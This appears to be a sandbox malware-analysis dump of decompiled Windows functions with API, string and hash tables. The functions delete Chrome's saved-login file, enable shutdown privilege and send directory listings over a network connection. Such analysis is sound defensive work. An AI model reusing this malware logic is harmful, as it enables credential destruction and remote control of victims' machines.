                              				void* _t171;
                              				signed int _t172;
                              				int _t176;
                              				signed int _t178;
                              				char** _t179;
                              				signed int _t183;
                              				signed int _t184;
                              				void* _t191;
                              				signed int _t192;
                              				void* _t193;
                              				signed int _t194;
                              
                              				_t178 = __esi;
                              				_t171 = __edi;
                              				_t65 = E0044154B();
                              				_v8 = _v8 & 0x00000000;
                              				_t137 = _t65;
                              				_v16 = _v16 & 0x00000000;
                              				_v12 = _t137;
                              				if(E004415A9( &_v8) != 0 || E00441551( &_v16) != 0) {
                              					L46:
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					E0043629A();
                              					asm("int3");
                              					_t191 = _t193;
                              					_t194 = _t193 - 0x10;
                              					_push(_t137);
                              					_t179 = E0044154B();
                              					_v52 = 0;
                              					_v56 = 0;
                              					_v60 = 0;
                              					_t72 = E004415A9( &_v52);
                              					_t143 = _t178;
                              					__eflags = _t72;
                              					if(_t72 != 0) {
                              						L66:
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						E0043629A();
                              						asm("int3");
                              						_push(_t191);
                              						_t192 = _t194;
                              						_t74 =  *0x46a00c; // 0x5d382218
                              						_v100 = _t74 ^ _t192;
                              						 *0x46a344 =  *0x46a344 | 0xffffffff;
                              						 *0x46a338 =  *0x46a338 | 0xffffffff;
                              						_push(0);
                              						_push(_t179);
                              						_push(_t171);
                              						_t139 = "TZ";
                              						_t172 = 0;
                              						 *0x46b748 = 0;
                              						_t78 = E004391A5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                              						__eflags = _t78;
                              						if(_t78 != 0) {
                              							__eflags = _t78 - 0x22;
                              							if(_t78 == 0x22) {
                              								_t184 = E0043E61D(_t143, _v276);
                              								__eflags = _t184;
                              								if(__eflags != 0) {
                              									_t85 = E004391A5(__eflags,  &_v280, _t184, _v276, _t139);
                              									__eflags = _t85;
                              									if(_t85 == 0) {
                              										L0043EE85(0);
                              										_t172 = _t184;
                              									} else {
                              										_push(_t184);
                              										goto L72;
                              									}
                              								} else {
                              									_push(0);
                              									L72:
                              									L0043EE85();
                              								}
                              							}
                              						} else {
                              							_t172 =  &_v272;
                              						}
                              						asm("sbb esi, esi");
                              						_t183 =  ~(_t172 -  &_v272) & _t172;
                              						__eflags = _t172;
                              						if(_t172 == 0) {
                              							L80:
                              							L47();
                              						} else {
                              							__eflags =  *_t172;
                              							if(__eflags == 0) {
                              								goto L80;
                              							} else {
                              								_push(_t172);
                              								E0044190C(_t139, _t172, _t183, __eflags);
                              							}
                              						}
                              						L0043EE85(_t183);
                              						__eflags = _v16 ^ _t192;
                              						return E0042F61B(_v16 ^ _t192);
                              					} else {
                              						_t89 = E00441551( &_v16);
                              						_pop(_t143);
                              						__eflags = _t89;
                              						if(_t89 != 0) {
                              							goto L66;
                              						} else {
                              							_t91 = E0044157D( &_v20);
                              							_pop(_t143);
                              							__eflags = _t91;
                              							if(_t91 != 0) {
                              								goto L66;
                              							} else {
                              								L0043EE85( *0x46b740);
                              								 *0x46b740 = 0;
                              								 *_t194 = 0x46b750;
                              								_t93 = GetTimeZoneInformation(??);
                              								__eflags = _t93 - 0xffffffff;
                              								if(_t93 != 0xffffffff) {
                              									_t150 =  *0x46b750 * 0x3c;
                              									_t167 =  *0x46b7a4; // 0x0
                              									_push(_t171);
                              									 *0x46b748 = 1;
                              									_v12 = _t150;
                              									__eflags =  *0x46b796; // 0x0
                              									if(__eflags != 0) {
                              										_t151 = _t150 + _t167 * 0x3c;
                              										__eflags = _t151;
                              										_v12 = _t151;
                              									}
                              									__eflags =  *0x46b7ea; // 0x0
                              									if(__eflags == 0) {
                              										L56:
                              										_v16 = 0;
                              										_v20 = 0;
                              									} else {
                              										_t106 =  *0x46b7f8; // 0x0
                              										__eflags = _t106;
                              										if(_t106 == 0) {
                              											goto L56;
                              										} else {
                              											_v16 = 1;
                              											_v20 = (_t106 - _t167) * 0x3c;
                              										}
                              									}
                              									_t176 = E0043E1EC(0, _t167);
                              									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                              									__eflags = _t99;
                              									if(_t99 == 0) {
                              										L60:
                              										 *( *_t179) = 0;
                              									} else {
                              										__eflags = _v24;
                              										if(_v24 != 0) {
                              											goto L60;
                              										} else {
                              											( *_t179)[0x3f] = 0;
                              										}
                              									}
                              									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                              									__eflags = _t102;
                              									if(_t102 == 0) {
                              										L64:
                              										 *(_t179[1]) = 0;
                              									} else {
                              										__eflags = _v24;
                              										if(_v24 != 0) {
                              											goto L64;
                              										} else {
                              											_t179[1][0x3f] = 0;
                              										}
                              									}
                              								}
                              								 *(E00441545()) = _v12;
                              								 *((intOrPtr*)(E00441539())) = _v16;
                              								_t96 = E0044153F();
                              								 *_t96 = _v20;
                              								return _t96;
                              							}
                              						}
                              					}
                              				} else {
                              					_t168 =  *0x46b740; // 0x0
                              					_t178 = _a4;
                              					if(_t168 == 0) {
                              						L12:
                              						L0043EE85(_t168);
                              						_t154 = _t178;
                              						_t12 = _t154 + 1; // 0x441cfd
                              						_t169 = _t12;
                              						do {
                              							_t113 =  *_t154;
                              							_t154 = _t154 + 1;
                              						} while (_t113 != 0);
                              						_t13 = _t154 - _t169 + 1; // 0x441cfe
                              						 *0x46b740 = E0043E61D(_t154 - _t169, _t13);
                              						_t116 = L0043EE85(0);
                              						_t170 =  *0x46b740; // 0x0
                              						if(_t170 == 0) {
                              							goto L45;
                              						} else {
                              							_t158 = _t178;
                              							_push(_t171);
                              							_t14 = _t158 + 1; // 0x441cfd
                              							_t171 = _t14;
                              							do {
                              								_t117 =  *_t158;
                              								_t158 = _t158 + 1;
                              							} while (_t117 != 0);
                              							_t15 = _t158 - _t171 + 1; // 0x441cfe
                              							_t119 = E004405A6(_t170, _t15, _t178);
                              							_t193 = _t193 + 0xc;
                              							if(_t119 == 0) {
                              								_t171 = 3;
                              								_push(_t171);
                              								_t120 = E0044C479(_t159,  *_t137, 0x40, _t178);
                              								_t193 = _t193 + 0x10;
                              								if(_t120 == 0) {
                              									while( *_t178 != 0) {
                              										_t178 = _t178 + 1;
                              										_t171 = _t171 - 1;
                              										if(_t171 != 0) {
                              											continue;
                              										}
                              										break;
                              									}
                              									_pop(_t171);
                              									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                              									if(_t137 != 0) {
                              										_t178 = _t178 + 1;
                              									}
                              									_t161 = E00436079(_t159, _t178) * 0xe10;
                              									_v8 = _t161;
                              									while(1) {
                              										_t122 =  *_t178;
                              										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                              											break;
                              										}
                              										_t178 = _t178 + 1;
                              									}
                              									__eflags =  *_t178 - 0x3a;
                              									if( *_t178 == 0x3a) {
                              										_t178 = _t178 + 1;
                              										_t161 = _v8 + E00436079(_t161, _t178) * 0x3c;
                              										_v8 = _t161;
                              										while(1) {
                              											_t132 =  *_t178;
                              											__eflags = _t132 - 0x30;
                              											if(_t132 < 0x30) {
                              												break;
                              											}
                              											__eflags = _t132 - 0x39;
                              											if(_t132 <= 0x39) {
                              												_t178 = _t178 + 1;
                              												__eflags = _t178;
                              												continue;
                              											}
                              											break;
                              										}
                              										__eflags =  *_t178 - 0x3a;
                              										if( *_t178 == 0x3a) {
                              											_t178 = _t178 + 1;
                              											_t161 = _v8 + E00436079(_t161, _t178);
                              											_v8 = _t161;
                              											while(1) {
                              												_t134 =  *_t178;
                              												__eflags = _t134 - 0x30;
                              												if(_t134 < 0x30) {
                              													goto L38;
                              												}
                              												__eflags = _t134 - 0x39;
                              												if(_t134 <= 0x39) {
                              													_t178 = _t178 + 1;
                              													__eflags = _t178;
                              													continue;
                              												}
                              												goto L38;
                              											}
                              										}
                              									}
                              									L38:
                              									__eflags = _t137;
                              									if(_t137 != 0) {
                              										_v8 = _t161;
                              									}
                              									__eflags =  *_t178;
                              									_t124 = 0 |  *_t178 != 0x00000000;
                              									_v16 = _t124;
                              									__eflags = _t124;
                              									_t125 = _v12;
                              									if(_t124 == 0) {
                              										_t29 = _t125 + 4; // 0xfffffddd
                              										 *((char*)( *_t29)) = 0;
                              										L44:
                              										 *(E00441545()) = _v8;
                              										_t128 = E00441539();
                              										 *_t128 = _v16;
                              										return _t128;
                              									}
                              									_push(3);
                              									_t28 = _t125 + 4; // 0xfffffddd
                              									_t129 = E0044C479(_t161,  *_t28, 0x40, _t178);
                              									_t193 = _t193 + 0x10;
                              									__eflags = _t129;
                              									if(_t129 == 0) {
                              										goto L44;
                              									}
                              								}
                              							}
                              							goto L46;
                              						}
                              					} else {
                              						_t166 = _t168;
                              						_t135 = _t178;
                              						while(1) {
                              							_t140 =  *_t135;
                              							if(_t140 !=  *_t166) {
                              								break;
                              							}
                              							if(_t140 == 0) {
                              								L8:
                              								_t116 = 0;
                              							} else {
                              								_t9 = _t135 + 1; // 0xdde805eb
                              								_t141 =  *_t9;
                              								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                              									break;
                              								} else {
                              									_t135 = _t135 + 2;
                              									_t166 = _t166 + 2;
                              									if(_t141 != 0) {
                              										continue;
                              									} else {
                              										goto L8;
                              									}
                              								}
                              							}
                              							L10:
                              							if(_t116 == 0) {
                              								L45:
                              								return _t116;
                              							} else {
                              								_t137 = _v12;
                              								goto L12;
                              							}
                              							goto L82;
                              						}
                              						asm("sbb eax, eax");
                              						_t116 = _t135 | 0x00000001;
                              						__eflags = _t116;
                              						goto L10;
                              					}
                              				}
                              				L82:
                              			}

                              0x00441a5e
                              0x00441a60
                              0x00000000
                              0x00000000
                              0x00441a57
                              0x00441a59
                              0x00441a5b
                              0x00441a5b
                              0x00000000
                              0x00441a5b
                              0x00000000
                              0x00441a59
                              0x00441a62
                              0x00441a65
                              0x00441a67
                              0x00441a72
                              0x00441a74
                              0x00441a7e
                              0x00441a7e
                              0x00441a80
                              0x00441a82
                              0x00000000
                              0x00000000
                              0x00441a79
                              0x00441a7b
                              0x00441a7d
                              0x00441a7d
                              0x00000000
                              0x00441a7d
                              0x00000000
                              0x00441a7b
                              0x00441a7e
                              0x00441a65
                              0x00441a84
                              0x00441a84
                              0x00441a86
                              0x00441a8a
                              0x00441a8a
                              0x00441a8f
                              0x00441a91
                              0x00441a94
                              0x00441a97
                              0x00441a99
                              0x00441a9c
                              0x00441ab4
                              0x00441ab7
                              0x00441aba
                              0x00441ac2
                              0x00441ac7
                              0x00441acc
                              0x00000000
                              0x00441acc
                              0x00441a9e
                              0x00441aa3
                              0x00441aa6
                              0x00441aab
                              0x00441aae
                              0x00441ab0
                              0x00000000
                              0x00000000
                              0x00441ab2
                              0x004419ff
                              0x00000000
                              0x004419e6
                              0x00441959
                              0x00441959
                              0x0044195b
                              0x0044195d
                              0x0044195d
                              0x00441961
                              0x00000000
                              0x00000000
                              0x00441965
                              0x00441979
                              0x00441979
                              0x00441967
                              0x00441967
                              0x00441967
                              0x0044196d
                              0x00000000
                              0x0044196f
                              0x0044196f
                              0x00441972
                              0x00441977
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00441977
                              0x0044196d
                              0x00441982
                              0x00441984
                              0x00441ad3
                              0x00441ad3
                              0x0044198a
                              0x0044198a
                              0x00000000
                              0x0044198a
                              0x00000000
                              0x00441984
                              0x0044197d
                              0x0044197f
                              0x0044197f
                              0x00000000
                              0x0044197f
                              0x00441957
                              0x00000000

                              APIs
                              • _free.LIBCMT ref: 0044198E
                              • _free.LIBCMT ref: 004419B2
                              • _free.LIBCMT ref: 00441B39
                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045912C), ref: 00441B4B
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00441BC3
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00441BF0
                              • _free.LIBCMT ref: 00441D05
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                              • String ID:
                              • API String ID: 314583886-0
                              • Opcode ID: 122cb5b7360bd66e5ca6bc6a22e3fe7cd2d82cee20dbff4bc8e5ffd411c2e10e
                              • Instruction ID: 27a0a09a5c018c0c883660709ccb2a601b23158d2266427735da08219fe15e6e
                              • Opcode Fuzzy Hash: 122cb5b7360bd66e5ca6bc6a22e3fe7cd2d82cee20dbff4bc8e5ffd411c2e10e
                              • Instruction Fuzzy Hash: 68C14A71900249AFEB209F69DC41AAA7BB8EF85314F1441AFE481E7261EB388DC1C758
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0040A291(void* __edi, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				void* __ebx;
                              				void* __ebp;
                              				long _t18;
                              				void* _t20;
                              				void* _t21;
                              				void* _t28;
                              				void* _t31;
                              				void* _t32;
                              
                              				_t35 = __eflags;
                              				_t31 = __edi;
                              				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
                              				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                              				L00401FA7();
                              				if(DeleteFileA(L00401F75( &_v28)) != 0) {
                              					_t28 = _t32 - 0x18;
                              					_push("\n[Chrome StoredLogins found, cleared!]");
                              					goto L6;
                              				} else {
                              					_t18 = GetLastError();
                              					if(_t18 == 0 || _t18 == 1) {
                              						_t28 = _t32 - 0x18;
                              						_push("\n[Chrome StoredLogins not found]");
                              						L6:
                              						E00402064(_t20, _t28);
                              						L0040AA8C(_t20, _t30, __eflags);
                              						_t21 = 1;
                              					} else {
                              						_t21 = 0;
                              					}
                              				}
                              				L00401FA7();
                              				return _t21;
                              			}


                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A2CD
                              • GetLastError.KERNEL32 ref: 0040A2D7
                              Strings
                              • UserProfile, xrefs: 0040A29D
                              • [Chrome StoredLogins not found], xrefs: 0040A2F1
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040A2FD
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A298
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 1f731214c167fda0d83f9a6878225b47f39a7a770fc5d80665c52e7481636777
                              • Instruction ID: 3bbe084eb151dafee0128e30ec1122695afa5e51df6dfb55aa123115758e1eef
                              • Opcode Fuzzy Hash: 1f731214c167fda0d83f9a6878225b47f39a7a770fc5d80665c52e7481636777
                              • Instruction Fuzzy Hash: DE01F221A803095BCA04BAB5CD1B8AE7724A912305B50027FFC02732E2ED7E491986DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004132F7() {
                              				void* _v8;
                              				intOrPtr _v12;
                              				struct _TOKEN_PRIVILEGES _v24;
                              
                              				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                              				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                              				_v24.PrivilegeCount = 1;
                              				_v12 = 2;
                              				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                              				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                              			}


                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
                              • GetLastError.KERNEL32 ref: 00413342
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction ID: 9f46d7e8cb4fae5eef3d6f74a49905a97f95598c6ea8fd14d39892eab67246b1
                              • Opcode Fuzzy Hash: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction Fuzzy Hash: B7F03A71801229BBDB10AFA1ED0DEEFBF7CEF05A52F000060B905A2196D6348B14CAA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E004077EE(signed int __ecx, void* __edx, void* __eflags) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t106;
                              				intOrPtr* _t111;
                              				signed int _t121;
                              				void* _t133;
                              				void* _t154;
                              				void* _t157;
                              				signed int _t158;
                              				signed int _t159;
                              				signed int _t160;
                              				signed int _t161;
                              				signed int _t172;
                              				signed int _t185;
                              				signed int _t186;
                              				signed int _t188;
                              				void* _t206;
                              				char* _t220;
                              				char* _t221;
                              				void* _t255;
                              				void* _t264;
                              				signed int _t267;
                              				void* _t273;
                              				void* _t279;
                              				void* _t281;
                              				intOrPtr _t282;
                              				void* _t283;
                              				void* _t284;
                              				void* _t287;
                              
                              				_t255 = __edx;
                              				_t188 = __ecx;
                              				E00450918(0x451e92, _t279);
                              				_t282 = _t281 - 0x300;
                              				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
                              				_t185 = _t188;
                              				 *(_t279 - 0x18) = _t185;
                              				E004020B5(_t185, _t279 - 0x9c);
                              				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
                              				 *_t185 = 0;
                              				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
                              				_t186 = _t185 + 4;
                              				E00404955(_t186);
                              				_t283 = _t282 - 0x10;
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				_t106 = E004049D2(_t255, _t264);
                              				_t289 = _t106;
                              				if(_t106 == 0) {
                              					_push(0);
                              					_push(0);
                              					goto L4;
                              				} else {
                              					_t283 = _t283 - 0x18;
                              					L00402F73(_t186, _t283, L00402F97(_t279 - 0x6c, _t279 + 0x38, 0x46c238), _t289, _t279 + 0x50);
                              					_push(0x64);
                              					_t186 = _t186 & 0xffffff00 | L00404A6E(_t186, _t186, _t179, _t289) == 0xffffffff;
                              					L00401FA7();
                              					_t291 = _t186;
                              					if(_t186 != 0) {
                              						L00404DD5( *(_t279 - 0x18) + 4);
                              						 *((intOrPtr*)(_t279 - 0x20)) = 1;
                              						_push(0x4685c0);
                              						_t157 = _t279 - 0x20;
                              						L3:
                              						_push(_t157);
                              						L4:
                              						E0043196A();
                              					}
                              				}
                              				_t266 = E004022EA(_t279 + 0x20, _t279 - 0x30);
                              				_t111 = E004022AD(_t279 + 0x20, _t279 - 0x34);
                              				E00408228(_t279 - 0x3c,  *((intOrPtr*)(E004022EA(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
                              				_t284 = _t283 + 0xc;
                              				_t256 = _t279 + 8;
                              				_t273 = FindFirstFileW(L00401ECB(E00407516(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
                              				 *(_t279 - 0x1c) = _t273;
                              				L00401ED0();
                              				_t291 = _t273 - 0xffffffff;
                              				if(_t273 != 0xffffffff) {
                              					goto L7;
                              				} else {
                              					_t283 = _t284 - 0x18;
                              					E00402064(_t186, _t283, 0x45f6ac);
                              					_push(0x65);
                              					L00404A6E(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
                              					L00404DD5( *(_t279 - 0x18) + 4);
                              					 *((intOrPtr*)(_t279 - 0x24)) = 2;
                              					_push(0x4685c0);
                              					_t157 = _t279 - 0x24;
                              					goto L3;
                              				}
                              				while(1) {
                              					L7:
                              					_t121 = FindNextFileW(_t273, _t279 - 0x304);
                              					__eflags = _t121;
                              					if(_t121 == 0) {
                              						break;
                              					}
                              					_t186 =  *(_t279 - 0x18);
                              					__eflags =  *_t186;
                              					if( *_t186 == 0) {
                              						__eflags =  *(_t279 - 0x304) & 0x00000010;
                              						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
                              							L31:
                              							E0040425F(_t186, _t279 - 0x84, _t279 - 0x2d8);
                              							_t266 = E004022EA(_t279 - 0x84, _t279 - 0x3c);
                              							_t276 = E004022AD(_t279 - 0x84, _t279 - 0x38);
                              							E00408228(_t279 - 0x30,  *((intOrPtr*)(E004022EA(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
                              							_t284 = _t284 + 0xc;
                              							__eflags = E00408099(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
                              							if(__eflags == 0) {
                              								L34:
                              								L00401ED0();
                              								_t273 =  *(_t279 - 0x1c);
                              								continue;
                              							} else {
                              								L00401FB1(_t279 - 0x9c, _t256, _t276, E0040208B(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
                              								L00401FA7();
                              								_t284 = _t284 - 0x18;
                              								_t256 = L00402F73(_t186, _t279 - 0x54, L00416CF4(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x46c238);
                              								L00402F73(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
                              								_push(0x66);
                              								_t154 = L00404A6E(_t186, _t186 + 4, _t152, __eflags);
                              								__eflags = _t154 - 0xffffffff;
                              								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
                              								L00401FA7();
                              								L00401FA7();
                              								__eflags = _t186;
                              								if(_t186 == 0) {
                              									goto L34;
                              								} else {
                              									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
                              									_push(0x4685c0);
                              									_t157 = _t279 - 0x2c;
                              									goto L3;
                              								}
                              							}
                              						} else {
                              							_t220 = ".";
                              							_t158 = _t279 - 0x2d8;
                              							while(1) {
                              								_t256 =  *_t158;
                              								__eflags = _t256 -  *_t220;
                              								if(_t256 !=  *_t220) {
                              									break;
                              								}
                              								__eflags = _t256;
                              								if(_t256 == 0) {
                              									L17:
                              									_t159 = 0;
                              								} else {
                              									_t256 =  *((intOrPtr*)(_t158 + 2));
                              									_t43 =  &(_t220[2]); // 0x2e0000
                              									__eflags = _t256 -  *_t43;
                              									if(_t256 !=  *_t43) {
                              										break;
                              									} else {
                              										_t158 = _t158 + 4;
                              										_t220 =  &(_t220[4]);
                              										__eflags = _t256;
                              										if(_t256 != 0) {
                              											continue;
                              										} else {
                              											goto L17;
                              										}
                              									}
                              								}
                              								L19:
                              								__eflags = _t159;
                              								if(_t159 == 0) {
                              									goto L31;
                              								} else {
                              									_t221 = L"..";
                              									_t160 = _t279 - 0x2d8;
                              									while(1) {
                              										_t256 =  *_t160;
                              										__eflags = _t256 -  *_t221;
                              										if(_t256 !=  *_t221) {
                              											break;
                              										}
                              										__eflags = _t256;
                              										if(_t256 == 0) {
                              											L25:
                              											_t161 = 0;
                              										} else {
                              											_t256 =  *((intOrPtr*)(_t160 + 2));
                              											_t46 =  &(_t221[2]); // 0x2e
                              											__eflags = _t256 -  *_t46;
                              											if(_t256 !=  *_t46) {
                              												break;
                              											} else {
                              												_t160 = _t160 + 4;
                              												_t221 =  &(_t221[4]);
                              												__eflags = _t256;
                              												if(_t256 != 0) {
                              													continue;
                              												} else {
                              													goto L25;
                              												}
                              											}
                              										}
                              										L27:
                              										__eflags = _t161;
                              										if(__eflags == 0) {
                              											goto L31;
                              										} else {
                              											_t256 = E00408252(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0040425F(_t186, _t279 - 0x54, _t279 - 0x2d8));
                              											E00403086(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
                              											L00401ED0();
                              											L00401ED0();
                              											_t287 = _t284 - 0x18;
                              											E00407352(_t186, _t287, _t164, __eflags, _t279 + 0x20);
                              											_t284 = _t287 - 0x18;
                              											E00407352(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
                              											_t172 = L00407C57(_t186, _t164, __eflags);
                              											__eflags = _t172;
                              											if(_t172 != 0) {
                              												L00401ED0();
                              												goto L31;
                              											} else {
                              												 *((intOrPtr*)(_t279 - 0x28)) = 3;
                              												_push(0x4685c0);
                              												_t157 = _t279 - 0x28;
                              												goto L3;
                              											}
                              										}
                              										goto L37;
                              									}
                              									asm("sbb eax, eax");
                              									_t161 = _t160 | 0x00000001;
                              									__eflags = _t161;
                              									goto L27;
                              								}
                              								goto L37;
                              							}
                              							asm("sbb eax, eax");
                              							_t159 = _t158 | 0x00000001;
                              							__eflags = _t159;
                              							goto L19;
                              						}
                              						L37:
                              						L00401FA7();
                              						L00401ED0();
                              						L00401ED0();
                              						L00401FA7();
                              						_t133 = L00401FA7();
                              						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
                              						return _t133;
                              					} else {
                              						FindClose(_t273);
                              						_t206 = _t186 + 4;
                              					}
                              					L10:
                              					L00404DD5(_t206);
                              					goto L37;
                              				}
                              				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
                              				FindClose(_t273);
                              				_t267 =  *(_t279 - 0x18);
                              				L00402F73(_t186, _t284 - 0x18, L00402F97(_t279 - 0x54, _t279 + 0x38, 0x46c238), __eflags, _t279 + 0x50);
                              				_push(0x67);
                              				L00404A6E(_t186, _t267 + 4, _t124, __eflags);
                              				L00401FA7();
                              				_t206 = _t267 + 4;
                              				goto L10;
                              			}

                              0x00407925
                              0x0040792d
                              0x00407935
                              0x0040793a
                              0x00407941
                              0x00407946
                              0x00000000
                              0x00407946
                              0x0040794e
                              0x0040794e
                              0x00407956
                              0x0040795c
                              0x0040795e
                              0x00000000
                              0x00000000
                              0x00407964
                              0x00407967
                              0x0040796a
                              0x00407980
                              0x00407987
                              0x00407a8e
                              0x00407a9b
                              0x00407aaf
                              0x00407ac0
                              0x00407ada
                              0x00407adf
                              0x00407af3
                              0x00407af6
                              0x00407b93
                              0x00407b99
                              0x00407b9e
                              0x00000000
                              0x00407afc
                              0x00407b17
                              0x00407b1f
                              0x00407b24
                              0x00407b4e
                              0x00407b52
                              0x00407b58
                              0x00407b5d
                              0x00407b62
                              0x00407b65
                              0x00407b6b
                              0x00407b76
                              0x00407b7b
                              0x00407b7d
                              0x00000000
                              0x00407b7f
                              0x00407b7f
                              0x00407b86
                              0x00407b8b
                              0x00000000
                              0x00407b8b
                              0x00407b7d
                              0x0040798d
                              0x0040798d
                              0x00407992
                              0x00407998
                              0x00407998
                              0x0040799b
                              0x0040799e
                              0x00000000
                              0x00000000
                              0x004079a0
                              0x004079a3
                              0x004079ba
                              0x004079ba
                              0x004079a5
                              0x004079a5
                              0x004079a9
                              0x004079a9
                              0x004079ad
                              0x00000000
                              0x004079af
                              0x004079af
                              0x004079b2
                              0x004079b5
                              0x004079b8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004079b8
                              0x004079ad
                              0x004079c3
                              0x004079c3
                              0x004079c5
                              0x00000000
                              0x004079cb
                              0x004079cb
                              0x004079d0
                              0x004079d6
                              0x004079d6
                              0x004079d9
                              0x004079dc
                              0x00000000
                              0x00000000
                              0x004079de
                              0x004079e1
                              0x004079f8
                              0x004079f8
                              0x004079e3
                              0x004079e3
                              0x004079e7
                              0x004079e7
                              0x004079eb
                              0x00000000
                              0x004079ed
                              0x004079ed
                              0x004079f0
                              0x004079f3
                              0x004079f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004079f6
                              0x004079eb
                              0x00407a01
                              0x00407a01
                              0x00407a03
                              0x00000000
                              0x00407a09
                              0x00407a2d
                              0x00407a32
                              0x00407a3e
                              0x00407a46
                              0x00407a4b
                              0x00407a54
                              0x00407a59
                              0x00407a62
                              0x00407a69
                              0x00407a6e
                              0x00407a70
                              0x00407a89
                              0x00000000
                              0x00407a72
                              0x00407a72
                              0x00407a79
                              0x00407a7e
                              0x00000000
                              0x00407a7e
                              0x00407a70
                              0x00000000
                              0x00407a03
                              0x004079fc
                              0x004079fe
                              0x004079fe
                              0x00000000
                              0x004079fe
                              0x00000000
                              0x004079c5
                              0x004079be
                              0x004079c0
                              0x004079c0
                              0x00000000
                              0x004079c0
                              0x00407c19
                              0x00407c1f
                              0x00407c27
                              0x00407c2f
                              0x00407c37
                              0x00407c3f
                              0x00407c47
                              0x00407c54
                              0x0040796c
                              0x0040796d
                              0x00407973
                              0x00407973
                              0x00407976
                              0x00407976
                              0x00000000
                              0x00407976
                              0x00407ba6
                              0x00407bab
                              0x00407bb1
                              0x00407bd2
                              0x00407bd8
                              0x00407bdd
                              0x00407be5
                              0x00407bea
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 004077F3
                                • Part of subcall function 004049D2: connect.WS2_32(?,0046DB88,00000010), ref: 004049ED
